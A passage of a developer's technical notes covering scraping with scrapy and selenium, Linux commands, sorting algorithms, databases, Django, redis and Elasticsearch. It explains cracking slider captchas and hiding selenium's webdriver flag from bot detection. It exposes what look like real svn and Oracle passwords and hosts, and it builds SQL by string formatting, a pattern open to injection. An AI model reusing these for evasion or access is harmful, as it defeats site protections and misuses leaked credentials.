With cv2: read the background image, convert it to grayscale to reduce noise, read the template image, use cv2's built-in template matching to locate the template inside the background, then use minMaxLoc to extract the best and worst matches. It returns a 4-tuple such as (-0.3, 0.95, (121, 54), (45, 543)): the minimum match score, the maximum match score, the coordinates of the minimum match, and the coordinates of the maximum match.
Usually what we need is the coordinate of the maximum match (its x and y), but not always; sometimes the minimum-match coordinate is the right one, so it is best to compare the absolute values of the two scores.
The two core steps of cracking a slider captcha are finding the gap distance and generating a track to slide along; in trickier cases you also have to account for the template's initial position inside the background image and the width of the template's transparent border, both of which affect the track.
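A condensed sketch of that flow using minMaxLoc (file names are placeholders; the matching call mirrors the FindPic snippet above):
~~~python
import cv2

def gap_offset(target="target.jpg", template="template.png"):
    """Return the x coordinate of the best template match inside the background image."""
    target_gray = cv2.cvtColor(cv2.imread(target), cv2.COLOR_BGR2GRAY)
    template_gray = cv2.imread(template, 0)
    res = cv2.matchTemplate(target_gray, template_gray, cv2.TM_CCOEFF_NORMED)
    min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
    # compare absolute scores, as noted above; usually max_loc is the gap position
    loc = min_loc if abs(min_val) > abs(max_val) else max_loc
    return loc[0]
~~~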
# 23. Using selenium inside scrapy
~~~python
class SeleniumDownloadMiddleware(object):
def __init__(self):
self.driver = webdriver.Chrome()
def process_request(self, request, spider):
self.driver.get(request.url)
time.sleep(1)
try:
while True:
showmore = self.driver.find_element_by_class_name('show-more')
showmore.click()
time.sleep(0.3)
if not showmore:
break
except:
pass
        # grab the rendered page source; the read/comment/like counts are loaded via ajax,
        # so a short delay is needed and plain xpath on the raw html cannot see them
source = self.driver.page_source
response = HtmlResponse(url=self.driver.current_url, body=source, request=request, encoding="utf-8")
return response
~~~
# 24. Deploying scrapy with scrapyd
1. In the scrapy project directory run `sudo scrapyd` or `scrapyd` to start the scrapyd service, or run it as a background process with `nohup scrapyd > scrapyd.log 2>&1 &`
    1. 2 stands for standard error
    2. 1 stands for standard output
    3. 2>&1 redirects standard error into standard output
2. Deploy the scrapy project: `scrapyd-deploy deployname -p myspider`
3. Start one of the project's spiders: `curl http://localhost:6800/schedule.json -d project=myspider -d spider=tencent`
4. Cancel a spider: `curl http://localhost:6800/cancel.json -d project=myspider -d job=tencent` (or kill the processes: `ps aux | grep 'myspider' | awk '{print "kill -9 "$2}' | sh`)
listprojects.json -- list projects    listjobs.json -- list jobs    listspiders.json -- list spiders
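If you prefer Python over curl, the same scrapyd JSON endpoints can be called with requests; this is a sketch, not scrapyd's official client (project and spider names follow the examples above):
~~~python
import requests

SCRAPYD = "http://localhost:6800"

# schedule a spider (same as the curl schedule.json call above)
job_id = requests.post(f"{SCRAPYD}/schedule.json",
                       data={"project": "myspider", "spider": "tencent"}).json().get("jobid")
# list projects / spiders / jobs
print(requests.get(f"{SCRAPYD}/listprojects.json").json())
print(requests.get(f"{SCRAPYD}/listspiders.json", params={"project": "myspider"}).json())
print(requests.get(f"{SCRAPYD}/listjobs.json", params={"project": "myspider"}).json())
# cancel a running job
requests.post(f"{SCRAPYD}/cancel.json", data={"project": "myspider", "job": job_id})
~~~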
# 25. Selenium detection (window.navigator.webdriver)
~~~js
window.navigator.webdriver
selenium:true
chrome:undefined
~~~
Workaround:
~~~python
from selenium.webdriver import Chrome
from selenium.webdriver import ChromeOptions
option = ChromeOptions()
# headless mode, if needed:
# option.set_headless()
# option.headless = True
option.add_experimental_option('excludeSwitches', ['enable-automation'])
driver = Chrome(options=option)
~~~
The Chrome window started this way shows a notice in the top-right corner; ignore it and do not click the "disable" button.
# 26. Scheduled jobs with crontab
1. Edit the job list: crontab -e
Job format:
minute hour day month weekday command
m      h    d   m     week    command
30 * * * * ls      run ls at minute 30 of every hour
* */5 * * * ls     run ls every minute during every 5th hour
Notes:
weekday 0 means Sunday
* means "every"
*/n means "every n"
2. List the jobs: crontab -l
Scheduling a crawler:
from a terminal, inside the project:
1. create a .sh file in the crawler project
2. put the command to run into the .sh file:
cd `dirname $0` || exit 1
python ./main.py >> run.log 2>&1
3. make it executable: sudo chmod +x run.sh
4. crontab -e
5. */5 * * * * /home/ubuntu/..../myspider.sh >> /home/ubuntu/.../run2.log 2>&1
-------------------------------------------------------------------------------------------------------------
# 1. Python decorators that take arguments
~~~python
def set_level(level_num):
def set_func(func):
def call_func(*args, **kwargs):
if level_num == 1:
print("----权限级别1,验证----")
elif level_num == 2:
print("----权限级别2,验证----")
return func()
return call_func
return set_func
@set_level(1)
def test1():
print("-----test1---")
return "ok test1"
# a decorator that measures how long a function takes
def count_time(func):
    def int_time(*args, **kwargs):
        start_time = time.time()  # start time
        ret = func(*args, **kwargs)
        over_time = time.time()   # end time
        total_time = (over_time - start_time)
        print('%s took %.6f seconds' % (func, total_time))
return ret
return int_time
~~~
# 2. Sorting a dict by value
~~~python
json.dumps()  # dict -> str;    json.loads()  # str -> dict
~~~
~~~python
d={'a':24,'g':52,'i':12,'k':33}
sorted(d.items(), key=lambda x:x[1])
$:[('i', 12), ('a', 24), ('k', 33), ('g', 52)]
--------------------------------------------------
# top-10 most popular users, sorted descending by score
manito_score = sorted(result.items(), key=lambda x: float(x[1]), reverse=True)[:10]
---------------------------------------------------
# 排序 ret_json=[{'user_id':461687615,'manito_score':88},{'user_id':461687614,'manito_score':84}]
sorted_x = sorted(ret_json, key=lambda x: x['manito_score'], reverse=True)
# sorting by the values of two fields, both descending
sorted_x = dict(sorted(feature_result_list[0].items(), key=lambda x: (-(json.loads(x[1]).get('3010013') if json.loads(x[1]).get('3010013') else 0),-(json.loads(x[1]).get('3000015') if json.loads(x[1]).get('3000015') else 0))))
~~~
The filter function:
~~~python
dic = {'k1': 10, 'k2': 100, 'k3': 50, 'k4': 90}
print(list(filter(lambda x: x[1] > 50, dic.items())))  # keep the (key, value) tuples whose value is greater than 50; x[1] is the value
$:[('k2', 100), ('k4', 90)]
---------------------------------------------------------
# drop the entries whose value is None
result_dict = dict(filter(lambda x: x[1] is not None, ret.items()))
~~~
# 3. Bubble sort, insertion sort and quicksort in Python
~~~python
def BubbleSort(numList):
    if not numList:
        return numList
    for i in range(len(numList) - 1):
        # after each pass the largest remaining element has bubbled to the end
        for j in range(len(numList) - 1 - i):
            if numList[j] > numList[j + 1]:
                numList[j], numList[j + 1] = numList[j + 1], numList[j]
    return numList
Time complexity: best O(n) with an early-exit flag, worst O(n²)
~~~
~~~python
def insert_sort(alist):
    # starting from the second element (index 1), insert each element into the sorted prefix
    for i in range(1, len(alist)):
        # compare backwards from position i and swap while smaller than the previous element
        for j in range(i, 0, -1):
            if alist[j] < alist[j-1]:
                alist[j], alist[j-1] = alist[j-1], alist[j]
alist = [54,26,93,17,77,31,44,55,20]
insert_sort(alist)
Time complexity: best O(n), worst O(n²)
~~~
~~~python
def quick_sort(alist, start, end):
    """quicksort"""
    # recursion exit condition
    if start >= end:
        return
    # use the first element as the pivot
    mid = alist[start]
    # low is the cursor moving rightwards from the left end
    low = start
    # high is the cursor moving leftwards from the right end
    high = end
    while low < high:
        # while low and high have not met and the element at high is not smaller than the pivot, move high left
        while low < high and alist[high] >= mid:
            high -= 1
        # put the element at high into the slot at low
        alist[low] = alist[high]
        # while low and high have not met and the element at low is smaller than the pivot, move low right
        while low < high and alist[low] < mid:
            low += 1
        # put the element at low into the slot at high
        alist[high] = alist[low]
    # when the loop exits low == high: that is the pivot's final position
    alist[low] = mid
    # quicksort the sub-list left of the pivot
    quick_sort(alist, start, low-1)
    # quicksort the sub-list right of the pivot
    quick_sort(alist, low+1, end)
alist = [54,26,93,17,77,31,44,55,20]
quick_sort(alist,0,len(alist)-1)
print(alist)
Time complexity: average O(n log n), worst O(n²)
~~~
# 4. How does a public host talk to a machine on a private network?
Step 1: on the machine inside the private network, open a reverse tunnel with ssh:
`ssh -fNR port:localhost:22 publicUserName@publicIp`
-f run in the background
-N do not execute any remote command
-R create a reverse tunnel
port: any port that is not already in use
Step 2: log in to your public server and run:
`ssh localhost -p port`
-p must match the port chosen in step 1
Also make sure the user name is right.
After entering the password you are logged in to the private machine remotely.
# 5. Linux and vim commands
Compress: zip ana.zip anaconda-ks.cfg
Decompress: unzip fileName.zip
`lsof -i:8000` show what is using a given port
`netstat -tunlp | grep 8000` show the process listening on a given port
`du -sh *` show the size of everything in the current directory
```shell
python@ubuntu:~/kkbuluo$ du -sh *
96K 2018电影
240K fangtianxia
256K proxy-pool
188K search_proj
48M unsplash_spider
384K weibo_spider
```
`df -h` show disk usage
~~~shell
root@ubuntu:~# df -h
文件系统 容量 已用 可用 已用% 挂载点
udev 1.5G 0 1.5G 0% /dev
tmpfs 300M 8.8M 291M 3% /run
/dev/sda1 21G 13G 6.7G 66% /
tmpfs 1.5G 14M 1.5G 1% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 1.5G 0 1.5G 0% /sys/fs/cgroup
tmpfs 300M 56K 299M 1% /run/user/1000
~~~
`fdisk -l` show the disk partition table
~~~shell
root@ubuntu:~/kkbuluo# fdisk -l
Disk /dev/sda: 35 GiB, 37580963840 bytes, 73400320 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x39fde10b
设备 启动 Start 末尾 扇区 Size Id 类型
/dev/sda1 * 2048 64520191 64518144 30.8G 83 Linux
/dev/sda2 64520192 73400319 8880128 4.2G 5 扩展
/dev/sda5 64522240 73400319 8878080 4.2G 82 Linux 交换 / Solaris
~~~
Run a program in the background: `nohup python3 money_award.py &` writes the terminal output to nohup.out in the current directory
**vim: squeeze runs of spaces into one** `:%s/  */ /g`
**vim: search for a string** `/python`, press n for the next match
**vim: comment / uncomment multiple lines**: <https://blog.csdn.net/suixin_123/article/details/81393397>
**delete multiple lines**
* 1. in command mode, type ":set nu" to show line numbers;
* 2. find the line numbers of the lines you want to delete;
* 3. type ":32,65d" and press Enter; lines 32 to 65 are deleted
If you deleted the wrong lines, press 'u' in normal mode to undo
**vim: collect every line containing a keyword**:
* :let @a="" --- clear register a with the let command
* :g/book/y A --- append every line containing "book" to register a
* :put a --- paste the contents of register a below the cursor line
# 6. Oracle database
* Get the current time (hour):
~~~sql
select sysdate,to_char(sysdate,'hh24') from dual;
sysdate to_char(sysdate,'HH24')
2019-08-26 10:07:24
~~~
* Reading Oracle query results as dicts from python
~~~python
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%Y-%m-%d %A %H:%M:%S',
filename='./info.log',
filemode='a'
)
# 支持中文
os.environ['NLS_LANG'] = 'SIMPLIFIED CHINESE_CHINA.UTF8'
conn = cx_Oracle.connect('dw_user/dw_userrainbow@106.75.248.35:15210/rainbow')
orcl_cursor = conn.cursor()
try:
    orcl_cursor.execute(sql)
    columns = [column[0] for column in orcl_cursor.description]
    for row in orcl_cursor.fetchall():
        result.append(dict(zip(columns, row)))
except Exception as e:
    logging.error(e)
finally:
    orcl_cursor.close()  # close the cursor before the connection
    conn.close()
~~~
* Query records created after a given time:
~~~sql
select * from WBC_SUBJECT where GMT_CREATE > to_date('2019-04-09 12:00:00','yyyy-mm-dd hh24:mi:ss');
~~~
* Query the data from the last hour and a half:
~~~python
current_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
old_time =(datetime.datetime.now()+datetime.timedelta(minutes=-90)).strftime("%Y-%m-%d %H:%M:%S")
sql = """select TICKET_NO,ORDER_NO,DRAW_RESULT,MIX_TYPE,MULTIPLE,GMT_CREATE,ISSUE_NO,LOTTERY_TYPE,LOTTERY_SUB_TYPE,GMT_MODIFIED
from LTDR_PRINT_TICKET
where ((gmt_create>=to_date('%s', 'yyyy-mm-dd HH24:mi:ss')
and gmt_create<to_date('%s', 'yyyy-mm-dd HH24:mi:ss'))
or (gmt_modified >= to_date('%s', 'yyyy-mm-dd HH24:mi:ss')
and gmt_modified < to_date('%s', 'yyyy-mm-dd HH24:mi:ss')))
and DRAW_STATUS = 'DRAW_FINISH'
and MIX_TYPE is not null and DRAW_RESULT is not null""" % (old_time, current_time, old_time, current_time)
~~~
* Insert into Oracle, query, and update incrementally
~~~python
try:
db = cx_Oracle.connect('bd_warehouse/v5gaoo5c2uc1u4ye@192.168.16.16:1521/jczjtest') # 线上
# db = cx_Oracle.connect('bd_warehouse/bd_warehouse@10.0.12.2:1521/dev')
cursor = db.cursor()
in_data=[]
up_data=[]
for item in split_last_list:
item['DRAW_RESULT'] = item['DRAW_RESULT'].replace(', ', '|')
item['GMT_CREATE'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
item['GMT_MODIFIED'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
sql = """select ORDER_NO,ISSUE_NO,DRAW_RESULT,LOTTERY_SUB_TYPE from PRIZE_TICKET_SPLIT where ORDER_NO='%s' and DRAW_RESULT='%s' and GAME_NO='%s' and LOTTERY_SUB_TYPE='%s'""" % (item['ORDER_NO'], item['DRAW_RESULT'], item['GAME_NO'], item['LOTTERY_SUB_TYPE'])
cursor.execute(sql)
ret = cursor.fetchall()
# 判断是否有重复数据
if not ret:
in_data.append((item['ORDER_NO'], item['DRAW_RESULT'], item['MIX_TYPE'], item['MULTIPLE'], item['GMT_CREATE'], item['MATCH_COUNT'], item['UNIQUE_ID'], item['GAME_RESULT_SP'], item['UNIQUE_STATUS'], item['GAME_NO'], item['ISSUE_NO'], item['LOTTERY_TYPE'], item['LOTTERY_SUB_TYPE'], item['GMT_MODIFIED']))
else:
# 有重复数据
up_data.append((item['MULTIPLE'], item['GMT_CREATE'], item['GMT_MODIFIED'], item['ORDER_NO'],item['DRAW_RESULT'], item['GAME_NO'], item['MULTIPLE'], item['LOTTERY_SUB_TYPE']))
sql = """INSERT INTO PRIZE_TICKET_SPLIT (id, ORDER_NO, DRAW_RESULT, MIX_TYPE, MULTIPLE, GMT_CREATE, MATCH_COUNT, UNIQUE_ID, GAME_RESULT_SP, UNIQUE_STATUS, GAME_NO,ISSUE_NO,LOTTERY_TYPE,LOTTERY_SUB_TYPE,GMT_MODIFIED) VALUES (SEQ_PRIZE_TICKET_SPLIT.nextval, :v2, :v3, :v4, :v5,to_date(:v6,'yyyy-mm-dd hh24:mi:ss') ,:v7, :v8, :v9, :v10, :v11, :v12,:v13,:v14,to_date(:v15,'yyyy-mm-dd hh24:mi:ss'))"""
up_sql = """update PRIZE_TICKET_SPLIT set MULTIPLE=:v1,GMT_CREATE=to_date(:v2,'yyyy-mm-dd hh24:mi:ss'), GMT_MODIFIED=to_date(:v3,'yyyy-mm-dd hh24:mi:ss') where ORDER_NO=:v4 and DRAW_RESULT=:v5 and GAME_NO = :v6 and MULTIPLE < :v7 and LOTTERY_SUB_TYPE=:v8"""
if len(up_data)>0:
print('开始更新数据')
cursor.executemany(up_sql, up_data)
db.commit()
print('%d条数据更新Successful' % len(up_data))
logging.info('%d条数据更新Successful' % len(up_data))
if len(in_data) > 0:
print('开始插入数据')
cursor.executemany(sql,in_data)
db.commit()
print('%d条数据插入Successful'%len(in_data))
logging.info('%d条数据插入Successful'%len(in_data))
db.close()
except Exception as e:
logging.error(e)
~~~
# 7. Using crontab
the python file, main.py:
~~~python
import datetime
time_now = datetime.datetime.now().strftime("%Y-%m-%d %H-%M-%S")
print("the time is now: {}".format(time_now))
~~~
the executable file, run.sh:
~~~shell
cd `dirname $0` || exit 1           # cd into the directory of this shell script
python3 ./main.py >> run.log 2>&1   # append output to run.log, redirecting stderr to stdout
~~~
Edit the schedule (the file is created automatically if it does not exist): `crontab -e`
~~~shell
*/1 * * * * /home/python/Desktop/run.sh # run run.sh every minute
~~~
List the schedule: `crontab -l`
Remove the schedule: `crontab -r`
# 8. Project deployment
Kill a group of linux processes:
* `ps -ef | grep gunicorn | awk '{print $2}' | xargs kill -9`
Check the code out from svn onto the server:
* svn co --username=caoshangfei --password caoshangfei123456 https://huored.gicp.net:8088/svn/bd_anti_spam/trunk/线上搜索项目/search_system_online
* svn co --username=caoshangfei --password caoshangfei123456 https://huored.gicp.net:8088/svn/bd_python_recommend/branches/v2.0.0
* svn co --username=caoshangfei --password caoshangfei123456 https://huored.gicp.net:8088/svn/bd_python_recommend/branches/supplement
* svn co --username=caoshangfei --password caoshangfei123456 https://huored.gicp.net:8088/svn/bd_python_recommend/trunk
* Resolve conflicts: svn revert --depth=infinity . -----> svn update
* Go back to another revision: svn up -r REVISION
Deployment flow:
* as root: vim /etc/supervisord.conf
* sudo -i switches to root; from root, su - hadoop switches to the hadoop user
**Start gunicorn on hadoop005:** `/home/hadoop/.local/bin/gunicorn -b 192.168.17.25:8000 manage:app -c ./gunicorn_conf.py`
**Start the offline recommendation service:** `gunicorn -b 10.4.212.3:3000 -w 3 run_app:app --log-level=debug --log-file ./log/gunicorn.log`
**Managing the gunicorn processes with supervisorctl:**
~~~ini
[program:sensitive_word]
command=/opt/anaconda3/bin/gunicorn -b 10.4.212.4:7200 sensitive_word_api:app -c gunicorn_conf.py
directory=/home/admin/anti_spam/sensitive_word_model
startsecs=0
stopwaitsecs=0
autostart=true
autorestart=true
user=admin
environment=HOME=/home/admin
environment=NLS_LANG="Simplified Chinese_CHINA.ZHS16GBK"
stdout_logfile=/home/admin/anti_spam/sensitive_word_model/log/gunicorn.log
stderr_logfile=/home/admin/anti_spam/sensitive_word_model/log/gunicorn.err
~~~
# 9. MySQL deduplication
```mysql
-- find duplicate values of a single column
select name from films group by name having count(*)>1;
-- find rows duplicated on multiple columns and return all their fields
select * from films where(films.name,films.box_office) in (select name,box_office from films group by name,box_office having count(*)>1);
-- delete duplicate rows from the table:
-- 1. build a temporary table t2 holding the smallest id of each group of duplicates
-- 2. join on the columns that define a duplicate
-- 3. delete the rows in the original table whose id is larger than the id kept in t2
delete films from films,(select min(id) id,name,released from films group by name,released having count(*)>1) t2 where films.name = t2.name and films.released = t2.released and films.id>t2.id;
```
Optimistic locking: `update tb_sku set stock=2 where id=1 and stock=7;`
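A hedged pymysql sketch of the retry loop that usually goes with that optimistic-lock UPDATE (connection settings are placeholders; table and column names follow the example):
```python
import pymysql

def decrease_stock(sku_id, count, retries=3):
    conn = pymysql.connect(host="127.0.0.1", user="root", password="mysql123", database="shop")  # placeholders
    try:
        with conn.cursor() as cursor:
            for _ in range(retries):
                cursor.execute("SELECT stock FROM tb_sku WHERE id=%s", (sku_id,))
                row = cursor.fetchone()
                if row is None or row[0] < count:
                    return False
                stock = row[0]
                # WHERE stock=%s is the optimistic lock: 0 affected rows means another writer got there first
                affected = cursor.execute(
                    "UPDATE tb_sku SET stock=%s WHERE id=%s AND stock=%s",
                    (stock - count, sku_id, stock),
                )
                if affected:
                    conn.commit()
                    return True
            return False
    finally:
        conn.close()
```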
# 10. Getting request parameters in Django
1. Query string
```python
# /qs/?a=1&b=2&a=3
def qs(request):
a = request.GET.get('a')
b = request.GET.get('b')
alist = request.GET.getlist('a')
print(a) # 1
print(b) # 2
print(alist) # ['1','3']
return HttpResponse("OK")
```
**Important: the query string is independent of the request method; even for a POST request, request.GET still returns the query-string parameters.**
2. Form data (form-data)
```python
def get_body(request):
a = request.POST.get('a')
b = request.POST.get('b')
alist = request.POST.getlist('a')
print(a)
print(b)
print(alist)
return HttpResponse('OK')
```
**Important: request.POST can only read form data from the body of a POST request.**
3. Non-form body (e.g. JSON)
```python
# for example, to read the following JSON body:
# {"a": 1, "b": 2}
import json
def get_body_json(request):
json_str = request.body
    json_str = json_str.decode() # not needed on python 3.6+ (json.loads accepts bytes)
req_data = json.loads(json_str)
print(req_data['a'])
print(req_data['b'])
return HttpResponse('OK')
```
4. Request headers
```python
def get_headers(request):
print(request.COOKIES.get('name'))
print(request.META['CONTENT_TYPE'])
return HttpResponse("OK")
```
5. Commonly used HttpRequest attributes
```python
method、user、path、
```
# 11. Django Rest Framework
`request.data` returns the parsed request body, similar to standard Django's `request.POST` and `request.FILES` combined
`request.query_params` is the same as standard Django's `request.GET`
`set_password` / `check_password` hash and verify a user's password
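A minimal sketch of how these pieces typically fit together in a DRF view (the view, model and field names are assumptions, not from the original notes):
~~~python
from rest_framework.views import APIView
from rest_framework.response import Response
from django.contrib.auth.models import User

class RegisterView(APIView):
    def post(self, request):
        username = request.data.get("username")        # parsed body, JSON or form alike
        password = request.data.get("password")
        invite = request.query_params.get("invite")    # same as Django's request.GET
        user = User(username=username)
        user.set_password(password)                    # stores a hash, never the raw password
        user.save()
        return Response({"ok": user.check_password(password), "invite": invite})
~~~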
# 12. What are the drawbacks of using redis and how do you deal with them? Why is redis so fast?
Answer: there are four main problems.
(1) Consistency between the cache and the database on double writes
- Analysis: consistency is a classic distributed-systems problem, and it splits into eventual consistency and strong consistency. If you write both the database and the cache, inconsistency is unavoidable. The premise to keep in mind: data that requires strong consistency must not be cached. Everything we do only guarantees eventual consistency and merely lowers the probability of inconsistency; it cannot eliminate it completely.
- Answer: see ["Database and cache double-write consistency in distributed systems"](https://www.baidu.com/s?wd=%E3%80%8A%E5%88%86%E5%B8%83%E5%BC%8F%E4%B9%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E5%92%8C%E7%BC%93%E5%AD%98%E5%8F%8C%E5%86%99%E4%B8%80%E8%87%B4%E6%80%A7%E6%96%B9%E6%A1%88%E8%A7%A3%E6%9E%90%E3%80%8B&tn=24004469_oem_dg&rsv_dl=gh_pl_sl_csd) for a detailed analysis. In short: use the right update strategy, i.e. update the database first and then delete the cache; and because deleting the cache can fail, add a compensation mechanism such as a message queue.
(2) Cache avalanche
- Analysis: a cache avalanche happens when a large part of the cache expires at the same time and the next wave of requests all lands on the database, exhausting its connections.
- Answer: 1. add a random offset to expiry times so keys do not expire together; 2. use a mutex lock, at the cost of throughput; 3. use two caches, A with a 20-minute TTL and B with no TTL, and warm cache B yourself.
(3) Cache penetration
- Analysis: attackers deliberately request keys that do not exist in the cache, so every request goes straight to the database and exhausts its connections.
- Answer: 1. use a mutex: on a cache miss, acquire a lock before querying the database, and let callers that fail to get the lock sleep briefly and retry; 2. update the cache asynchronously; 3. put a fast validity check in front of the cache, e.g. a Bloom filter that holds all legitimate keys and rejects invalid ones immediately.
(4) Concurrent writes to the same cached key
- Answer: as follows
(a) If the operations on the key do not need to happen in a particular order:
use a distributed lock; whoever grabs the lock performs the set. Simple.
(b) If the operations must happen in a particular order:
suppose key1 should change from valueA (written by system A) to valueB (system B) to valueC (system C).
In that case store a timestamp with every value when writing to the database. Suppose the timestamps are:
```
system A  key1  {valueA 3:00}
system B  key1  {valueB 3:05}
system C  key1  {valueC 3:10}
```
If system B grabs the lock first, it sets key1 to {valueB 3:05}. When system A later grabs the lock it sees that valueA's timestamp is older than the one already cached, so it skips its set, and so on.
Why is redis so fast?
Analysis: this question probes redis internals; many candidates do not even know that redis uses a single-threaded worker model, so it is worth reviewing.
Answer: three main reasons:
(1) it operates purely in memory
(2) it is single-threaded, which avoids frequent context switches
(3) it uses non-blocking I/O multiplexing
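A hedged redis-py sketch of the mutex idea from (3), with TTL jitter from (2) (the key names and the load_from_db callable are made up):
~~~python
import json
import random
import time

import redis

r = redis.Redis(host="127.0.0.1", port=6379, db=0)

def get_with_mutex(key, load_from_db, ttl=300, lock_ttl=10):
    """Cache-aside read that uses SET NX as a mutex so only one caller rebuilds the cache."""
    value = r.get(key)
    if value is not None:
        return json.loads(value)
    lock_key = "lock:" + key
    if r.set(lock_key, 1, nx=True, ex=lock_ttl):     # only one caller wins the lock
        try:
            data = load_from_db()
            r.set(key, json.dumps(data), ex=ttl + random.randint(0, 60))  # jitter against avalanche
            return data
        finally:
            r.delete(lock_key)
    time.sleep(0.05)                                  # losers back off briefly, then re-check the cache
    return get_with_mutex(key, load_from_db, ttl, lock_ttl)
~~~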
# 13. Automatically retrying when bulk inserts into ES time out
Basic ES operations:
~~~python
# 创建index POST http://192.168.191.1:8000/create_index?index=xxx
@app.route('/create_index', methods=['POST'])
def create_index():
index = request.args.get('index')
result = es.indices.create(index=index, ignore=400)
return jsonify(result)
# 删除index DEL http://192.168.191.1:8000/delete_index?index=xxx
@app.route('/delete_index', methods=['DELETE'])
def delete_index():
index = request.args.get('index')
result = es.indices.delete(index=index, ignore=[400, 404])
print(result)
return jsonify(result)
# 创建mapping
@app.route('/create_mapping', methods=['POST'])
def create_mapping():
index = request.args.get('index')
mapping = {
"subject": {
"properties": {
"title": {
"type": "string",
'analyzer': 'ik_max_word',
'search_analyzer': 'ik_max_word',
},
"group": {
"type": "string"
},
"name": {
"type": "keyword",
"index": "not_analyzed"
},
"shortContent": {
"type": "string",
'analyzer': 'ik_max_word',
'search_analyzer': 'ik_max_word'
},
"longContent": {
"type": "string",
'analyzer': 'ik_max_word',
'search_analyzer': 'ik_max_word'
},
'manito_score':{
"type": "integer",
"fields": {
"sort": {
"type": "float",
"index": "not_analyzed"
}
}
}
}
}
}
result = es.indices.put_mapping(index=index, doc_type='subject', body=mapping)
return jsonify(result)
~~~
Bulk-inserting data into ES:
~~~python
from elasticsearch import Elasticsearch, helpers
# retry automatically when es times out:
# es = Elasticsearch([{'host':'10.7.131.4','port':9200}],timeout=60,max_retries=3,retry_on_timeout=True)
# connect to the es cluster
es = Elasticsearch(['10.7.131.4', '10.7.131.5', '10.7.131.6'],
                   sniff_on_connection_fail=True,  # refresh the node list when a node stops responding
                   sniff_timeout=180  # sniffing timeout
                   )
def gendata():
my_word = ['foo','bar','baz']
for word in my_word:
yield {
'_index':'news2',
'_type':'subject',
'title':word
}
helpers.bulk(es, gendata())
~~~
Querying all documents in ES:
~~~python
from elasticsearch import Elasticsearch, helpers
# connect to the ES cluster
es = Elasticsearch(['10.7.131.4', '10.7.131.5', '10.7.131.6'],
                   sniff_on_connection_fail=True,  # re-sniff nodes when one stops responding
                   sniff_timeout=180  # sniff timeout in seconds
                   )
def search():
es_search_options = set_search_optional()
es_result = get_search_result(es_search_options)
final_result = get_result_list(es_result)
return final_result
def get_result_list(es_result):
final_result = []
for item in es_result:
final_result.append(item['_source'])
return final_result
def get_search_result(es_search_options, scroll='5m', index='user', doc_type='cif_user', timeout="1m"):
es_result = helpers.scan(
client=es,
query=es_search_options,
scroll=scroll,
index=index,
doc_type=doc_type,
timeout=timeout
)
return es_result
def set_search_optional():
    # search options
es_search_options = {
"query": {
"match_all": {
}
}
}
return es_search_options
if __name__ == '__main__':
final_results = search()
# print([i.get('loginName') for i in final_results])
print(len(final_results))
~~~
# 14. XPath syntax
* Locating adjacent/sibling elements of the current element with XPath:
~~~
Nth preceding sibling:
preceding-sibling::div[N]
Nth following sibling:
following-sibling::div[N]
~~~
* Get the text of `a` tags whose content contains `评论[` but does not contain `原文`:
`.//a[contains(text(),"评论[") and not(contains(text(),"原文"))]/text()`
`//div[@class='xxx']/ul/li[not(@class)]/span/a/text()` selects `li` tags that have no `class` attribute
`//div[contains(@class,'xxx')]/span[last()]/a/text()` selects the last `span` under a `div` whose `class` contains 'xxx'
`//a[text()='下一页']/@href` selects `a` tags whose text equals “下一页” (next page)
# 15. HTML effect: lines that converge toward the mouse pointer
~~~html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Examples</title>
<meta name="description" content="">
<meta name="keywords" content="">
<link href="" rel="stylesheet">
</head>
<body>
<script>
!function(){function n(n,e,t){return n.getAttribute(e)||t}function e(n){return document.getElementsByTagName(n)}function t(){var t=e("script"),o=t.length,i=t[o-1];return{l:o,z:n(i,"zIndex",-1),o:n(i,"opacity",.5),c:n(i,"color","0,0,0"),n:n(i,"count",99)}}function o(){a=m.width=window.innerWidth||document.documentElement.clientWidth||document.body.clientWidth,c=m.height=window.innerHeight||document.documentElement.clientHeight||document.body.clientHeight}function i(){r.clearRect(0,0,a,c);var n,e,t,o,m,l;s.forEach(function(i,x){for(i.x+=i.xa,i.y+=i.ya,i.xa*=i.x>a||i.x<0?-1:1,i.ya*=i.y>c||i.y<0?-1:1,r.fillRect(i.x-.5,i.y-.5,1,1),e=x+1;e<u.length;e++)n=u[e],null!==n.x&&null!==n.y&&(o=i.x-n.x,m=i.y-n.y,l=o*o+m*m,l<n.max&&(n===y&&l>=n.max/2&&(i.x-=.03*o,i.y-=.03*m),t=(n.max-l)/n.max,r.beginPath(),r.lineWidth=t/2,r.strokeStyle="rgba("+d.c+","+(t+.2)+")",r.moveTo(i.x,i.y),r.lineTo(n.x,n.y),r.stroke()))}),x(i)}var a,c,u,m=document.createElement("canvas"),d=t(),l="c_n"+d.l,r=m.getContext("2d"),x=window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||function(n){window.setTimeout(n,1e3/45)},w=Math.random,y={x:null,y:null,max:2e4};m.id=l,m.style.cssText="position:fixed;top:0;left:0;z-index:"+d.z+";opacity:"+d.o,e("body")[0].appendChild(m),o(),window.onresize=o,window.onmousemove=function(n){n=n||window.event,y.x=n.clientX,y.y=n.clientY},window.onmouseout=function(){y.x=null,y.y=null};for(var s=[],f=0;d.n>f;f++){var h=w()*a,g=w()*c,v=2*w()-1,p=2*w()-1;s.push({x:h,y:g,xa:v,ya:p,max:6e3})}u=s.concat([y]),setTimeout(function(){i()},100)}();
</script>
</body>
</html>
~~~
# 16. Scrapyd cluster management with scrapyd + scrapydweb
**scrapyd:**
`step 1: pip install scrapyd scrapyd-client`
`step 2: change the default scrapyd config so scrapyd can bind to any IP:`
`~/.virtualenvs/spider/lib/python3.5/site-packages/scrapyd$ vim default_scrapyd.conf  ->  bind_address = 0.0.0.0`
`step 3: edit the project's scrapy.cfg:`
~~~python
[settings]
default = sina.settings
[deploy:sina_spider]
